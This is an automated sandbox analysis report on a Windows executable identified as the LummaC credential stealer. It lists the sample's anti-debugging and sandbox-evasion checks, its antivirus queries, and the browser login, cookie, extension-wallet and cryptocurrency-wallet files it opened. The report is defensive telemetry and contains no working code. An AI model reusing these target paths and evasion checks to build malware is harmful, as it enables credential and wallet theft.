Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: FvbuInU.exe, 00000000.00000002.1967709677.0000000000F44000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: FvbuInU.exe, 00000000.00000003.1420691528.0000000005CD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\FvbuInU.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\FvbuInU.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\FvbuInU.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: NTICE
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: SICE
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\FvbuInU.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe

Code function: 0_2_00DC90A0 rdtsc

0_2_00DC90A0

Source: C:\Users\user\Desktop\FvbuInU.exe

Code function: 0_2_00DA9660 LdrInitializeThunk,

0_2_00DA9660

Source: FvbuInU.exe, FvbuInU.exe, 00000000.00000002.1967709677.0000000000F44000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: OF/Program Manager

Source: C:\Users\user\Desktop\FvbuInU.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: FvbuInU.exe, 00000000.00000003.1772640592.000000000156C000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1772740310.00000000015C6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\FvbuInU.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: FvbuInU.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: 0.2.FvbuInU.exe.d60000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: FvbuInU.exe, 00000000.00000003.1531596694.00000000015EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyed
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: FvbuInU.exe, 00000000.00000003.1468199421.0000000005C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: FvbuInU.exe, 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
